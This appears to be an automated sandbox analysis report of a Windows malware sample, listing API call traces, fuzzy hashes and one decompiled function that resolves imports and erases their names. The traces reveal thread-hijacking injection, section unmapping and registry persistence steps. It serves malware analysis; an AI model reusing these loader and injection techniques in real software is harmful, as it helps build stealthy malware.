  • Total matches: 61
  • API ID: memcpy$RtlAllocateHeapmemset$HeapFreelstrcmpi
  • String ID:
  • API String ID: 2612869081-0
  • Opcode ID: c2dacee3140373e500c22aac8ec47d9c8ec65dfe813f0c9f26dc5badd2c4d201
  • Instruction ID: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
  • Opcode Fuzzy Hash: 4201C028044DC281C42710841061FF9A506EFD13B5C8CAB76DDA13F08B5D0273F53797
  • Instruction Fuzzy Hash: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,00000018,001ED278), ref: 001CAC70
  • memset.NTDLL ref: 001CAC81
  • lstrcmpi.KERNEL32(?,?), ref: 001CACC1
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CACEA
  • memcpy.NTDLL(00000000,?,?), ref: 001CACFE
  • memset.NTDLL ref: 001CAD0B
  • memcpy.NTDLL(?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD24
  • memcpy.NTDLL(-00000005,001EC42B,00000007,?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD3F
  • HeapFree.KERNEL32(00000000,?), ref: 001CAD5C
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: RtlAllocateHeaplstrlen$HeapFree_wcsuprlstrcatlstrcpymemcpy
  • String ID:
  • API String ID: 1573093752-0
  • Opcode ID: f08ef74051028bad1df3046b05b27150d2409501bab8048f9561d94f45d3640f
  • Instruction ID: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
  • Opcode Fuzzy Hash: F9F0FEB01D1901DB8023453EE06037DE502AC442E2B1C8617FD80B525F7F4372E0BF59
  • Instruction Fuzzy Hash: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
APIs
  • lstrlenW.KERNEL32(00000000), ref: 001CB606
  • RtlAllocateHeap.NTDLL(00000000,001EAC82), ref: 001CB61C
  • memcpy.NTDLL(00000000,00000000,001EAC80), ref: 001CB62F
  • _wcsupr.NTDLL ref: 001CB63A
  • lstrlenW.KERNEL32(?,001EAC80), ref: 001CB66C
  • RtlAllocateHeap.NTDLL(00000000,?,001EAC80), ref: 001CB681
  • lstrcpyW.KERNEL32(00000000,?), ref: 001CB697
  • lstrcatW.KERNEL32(00000000,001EC940), ref: 001CB6B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB6C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 33
  • API ID: lstrlen$CloseHandleDeleteFileHeapFreeMapViewOfFileRtlAllocateHeapUnmapViewOfFilewcstombs
  • String ID:
  • API String ID: 3071814901-0
  • Opcode ID: d05e3ff4273796c9b17326ba3024fd4693d54f1ec967c9ade7a5abc202e65e4f
  • Instruction ID: 7e783e8648c44d89f659e24c24dcd4eaacf23487424efcd1c96aaf08dceaf5d1
  • Opcode Fuzzy Hash: 8DF08B71654AC2CBD22778A6A6517BBF901FB532C3C4E3732DC40251681F4232D22B1B
  • Instruction Fuzzy Hash: 7e783e8648c44d89f659e24c24dcd4eaacf23487424efcd1c96aaf08dceaf5d1
APIs
    • Part of subcall function 001C7262: memset.NTDLL ref: 001C7284
    • Part of subcall function 001C7262: lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
    • Part of subcall function 001C7262: OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
    • Part of subcall function 001C7262: CloseHandle.KERNEL32(?), ref: 001C7331
  • MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,?,?,?,?), ref: 001C4D32
  • CloseHandle.KERNEL32(?), ref: 001C4D3E
  • lstrlenW.KERNEL32(00000000), ref: 001C4D58
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C4D69
  • wcstombs.NTDLL ref: 001C4D7A
  • lstrlen.KERNEL32(?), ref: 001C4D87
    • Part of subcall function 001D9462: lstrlen.KERNEL32(-00000002,00000000,?,-00000002,-00000002,?,001C4D99), ref: 001D9472
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • UnmapViewOfFile.KERNEL32(?,?,?,?,00000000,00000001), ref: 001C4DBC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C4DCE
  • DeleteFileW.KERNEL32(?), ref: 001C4DDC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 49
  • API ID: GetTickCountHeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapRtlImageNtHeaderStrRChrlstrlenwsprintf
  • String ID:
  • API String ID: 473458267-0
  • Opcode ID: 21cd21af9a4aaeb0892998a3b8bf2ca0770d14e129f35d2f1317603fddf0a3d6
  • Instruction ID: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
  • Opcode Fuzzy Hash: 82F05935850C435DC06788E5483AB3BE6417B002D8DDC6A33F9416D2066F8332969B6B
  • Instruction Fuzzy Hash: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
APIs
  • RtlImageNtHeader.NTDLL(?), ref: 001C165E
  • RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
  • GetTickCount.KERNEL32 ref: 001C169C
  • wsprintfA.USER32 ref: 001C16AC
  • RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
  • StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
  • lstrlen.KERNEL32(00000000), ref: 001C1702
  • RegCloseKey.ADVAPI32(?), ref: 001C171E
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 110
  • API ID: GetLastError$CancelIoCloseHandleCreateEventGetOverlappedResultReadFileWaitForMultipleObjectsWriteFile
  • String ID:
  • API String ID: 340323113-0
  • Opcode ID: c76374ab722defcc6b7910d2b5a917f55ad2d99158a8d4548ff4996c05cdb32e
  • Instruction ID: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
  • Opcode Fuzzy Hash: B7E05C3D03050183442319B00225F9BAF186F662C7A8C33E2FE84CD6975B01BBE58152
  • Instruction Fuzzy Hash: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,001CBA84,00000008,?,00000010,00000001,00000000,0000012B), ref: 001CB997
  • WriteFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9CB
  • ReadFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9D3
  • GetLastError.KERNEL32 ref: 001CB9DD
  • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 001CB9F9
  • GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001CBA12
  • CancelIo.KERNEL32(?), ref: 001CBA27
  • CloseHandle.KERNEL32(?), ref: 001CBA37
  • GetLastError.KERNEL32 ref: 001CBA3F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: 7849c8b9b33a94634046e8246dea9d068437be0b98cf428e6df4f247afe7f281
  • Instruction ID: 18e037570c349af28e5fb9d2891916f9b52bff2a0339ffa6542edc82ff0ccd9b
  • Opcode Fuzzy Hash: F1F0278087CDC3C3CA49888A09653622058EFE2B45CBC9398B4803901C1FA03D6A2B8E
  • Instruction Fuzzy Hash: 18e037570c349af28e5fb9d2891916f9b52bff2a0339ffa6542edc82ff0ccd9b
APIs
  • PathFindFileNameW.SHLWAPI(01B3618C), ref: 01B31246
  • lstrcmpiW.KERNEL32(00000000,?,01B37494), ref: 01B3124D
  • RegOpenKeyExA.ADVAPI32(80000001,01B38080,00000000,00000000,?,?,01B37494), ref: 01B3127E
  • lstrlenW.KERNEL32(?,01B37494), ref: 01B31292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 01B312AA
  • RegQueryValueExW.ADVAPI32(?,00000000,01B37494,00000000,01B37494,?,01B37494), ref: 01B312C9
  • StrStrIW.SHLWAPI(00000000), ref: 01B312E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B312F9
  • RegCloseKey.ADVAPI32(?,?,01B37494), ref: 01B31302
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 97
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID: d
  • API String ID: 307323562-2564639436
  • Opcode ID: 3424cbb1137d2442c81198497add0441f4db132d4a2ce8cb8b6f8920268ef235
  • Instruction ID: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
  • Opcode Fuzzy Hash: 76018E064AAA7143C6022C158545FBAF186EB03FB9C5CF710D560304CE0B4574E1F669
  • Instruction Fuzzy Hash: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
APIs
  • memset.NTDLL ref: 001DC393
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
    • Part of subcall function 001D90C0: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D90ED
    • Part of subcall function 001D90C0: SetLastError.KERNEL32(00000000,?,001DC3F5,00000000,?,00010007,00000004,?), ref: 001D90F4
  • ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
  • SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
    • Part of subcall function 001DC212: memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC212: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
    • Part of subcall function 001DC212: WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
    • Part of subcall function 001DC212: SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
  • ResumeThread.KERNEL32(00000004), ref: 001DC4D6
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 51
  • API ID: CreateFileGetLastErrorHeapFreeRegCloseKeyRegOpenKey
  • String ID: [FILE]$[FILE]
  • API String ID: 3351174444-3230400787
  • Opcode ID: 033c4394e70e99a6bf63e685e4473468f8b4c093a00da4e8f42c8e7bfe120adf
  • Instruction ID: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
  • Opcode Fuzzy Hash: 85F0DD3A594EC3CFD423249020157BAC805FB412E2CAD2716EA807E1C16F8333192F17
  • Instruction Fuzzy Hash: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C39AA
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
    • Part of subcall function 001D9EAA: lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
    • Part of subcall function 001D9EAA: lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
    • Part of subcall function 001D9EAA: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
    • Part of subcall function 001D95E9: lstrlenW.KERNEL32(?,00000000,001EAC80,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D95F5
    • Part of subcall function 001D95E9: memcpy.NTDLL(00000000,?,00000000,00000002,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D961D
    • Part of subcall function 001D95E9: memset.NTDLL ref: 001D962F
    • Part of subcall function 001C28FD: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001C28FD: lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
    • Part of subcall function 001C28FD: lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
    • Part of subcall function 001C28FD: RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C3A90
  • GetLastError.KERNEL32 ref: 001C3A9B
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C3AB0
  • RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 001C3AC1
    • Part of subcall function 001C29BF: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001C29BF: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
    • Part of subcall function 001C29BF: lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
    • Part of subcall function 001C29BF: HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 143
  • API ID: lstrlenmemset$GetProcAddressLoadLibrary
  • String ID: ~
  • API String ID: 3655391705-1707062198
  • Opcode ID: 193527b1eef174f7d3812915e618651906c6adafd0bce5f2d714c946695c6d1b
  • Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
  • Opcode Fuzzy Hash: A7F02E4D155F71CAE17D2005187BBAA70C3F39671BD25E9031552B31076991B3292FCC
  • Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
C-Code - Quality: 100%
			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44);
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}
Address column of the decompiled view above (one instruction address per source line in the original layout), spanning 0x00401389 to 0x00401483.
APIs
  • LoadLibraryA.KERNEL32(?), ref: 004013B6
  • lstrlenA.KERNEL32(?,?,?,004015E0,?), ref: 004013C9
  • memset.NTDLL ref: 004013D3
  • GetProcAddress.KERNEL32(?,00000002,?,?,?,004015E0,?), ref: 0040141E
  • lstrlenA.KERNEL32(00000002,?,?,?,004015E0,?), ref: 00401431
  • memset.NTDLL ref: 0040143B
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Similarity
  • Total matches: 31
  • API ID: CreateDirectory$CopyFileHeapFreeRtlAllocateHeaplstrcpy
  • String ID: \sols
  • API String ID: 2898405644-25449109
  • Opcode ID: 5497166955076156837619a2a098418b7cb76563a9d137fec855e451e2c56df1
  • Instruction ID: 44ec2210092a92e039f9b1496625380036570e436bac4a4be39adbf8d21673e3
  • Opcode Fuzzy Hash: F2E0ABB50504208B9013D4B671183389C4698102F219D4511FB06BC48FAFD302A5FB6E
  • Instruction Fuzzy Hash: 44ec2210092a92e039f9b1496625380036570e436bac4a4be39adbf8d21673e3
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
  • lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
  • CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 80
  • API ID: GetLastError$CloseHandleDuplicateHandleOpenProcessRegCloseKeyRegCreateKeyRegOpenKey
  • String ID:
  • API String ID: 3239362136-0
  • Opcode ID: 43d6ef705f251b34ef39b149b3ea3bd8fb900b51b25fecf4a76b54cbc8c7a116
  • Instruction ID: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
  • Opcode Fuzzy Hash: 4CD0C2B8000985CF04479878487AAFFEA01BEC21C155C5A72F9C06824F769172DF0B6B
  • Instruction Fuzzy Hash: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
APIs
  • OpenProcess.KERNEL32(00000040,00000000,?), ref: 001C2802
  • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 001C2820
  • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 001C2828
  • DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 001C2846
  • GetLastError.KERNEL32 ref: 001C285A
  • RegCloseKey.ADVAPI32(?), ref: 001C2865
  • CloseHandle.KERNEL32(00000000), ref: 001C286C
  • GetLastError.KERNEL32 ref: 001C2874
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSectionSleepmemset
  • String ID:
  • API String ID: 2472442912-0
  • Opcode ID: dc49271e526c1696018041de0017b0827111101275221657691e75393d626545
  • Instruction ID: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
  • Opcode Fuzzy Hash: AA11AD32257B7013C12B648249A877EFA85F7420DBC8C7610FAA43906D1F4792D05F7A
  • Instruction Fuzzy Hash: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
APIs
  • RtlAllocateHeap.NTDLL ref: 001CDD25
  • memset.NTDLL ref: 001CDD39
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetCurrentThreadId.KERNEL32(?,00001000,00001000,?), ref: 001CDDC8
  • GetCurrentThread.KERNEL32 ref: 001CDDDB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CDE7E
  • Sleep.KERNEL32(0000000A), ref: 001CDE88
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CDEAE
    • Part of subcall function 001CDCA5: NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
    • Part of subcall function 001CDCA5: RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
    • Part of subcall function 001CDCA5: HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: HeapFree$RegCloseKeyRegCreateKey
  • String ID:
  • API String ID: 3276616890-0
  • Opcode ID: b82f1d124a686c0fba74e06d606f12bbe42e9b5bf24afcb4d9ffa1ad41822641
  • Instruction ID: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
  • Opcode Fuzzy Hash: 4A118C6A048DC253C06778C5B1BB7F5C412BB82CD0C4D1363FEA46D65C6E8372D66B02
  • Instruction Fuzzy Hash: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
APIs
  • RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
  • HeapFree.KERNEL32(00000000,?), ref: 001C9E08
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C947B: lstrlen.KERNEL32(?,001E5048,00000000), ref: 001C94A0
    • Part of subcall function 001C947B: wsprintfA.USER32 ref: 001C94E0
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9514
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C954D
    • Part of subcall function 001C947B: memcpy.NTDLL(?,001EB23B,-000000FA), ref: 001C95B0
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,?,001EB240), ref: 001C95FF
    • Part of subcall function 001C947B: memcpy.NTDLL(?,?,00000000), ref: 001C9619
    • Part of subcall function 001C947B: memcpy.NTDLL(?,00000000,001CAB3A), ref: 001C9638
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C964E
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9672
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C96B4
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C96D3
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,00000008,-000000F7,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C96F2
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000003B), ref: 001C9708
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000001,00000000,?), ref: 001C971D
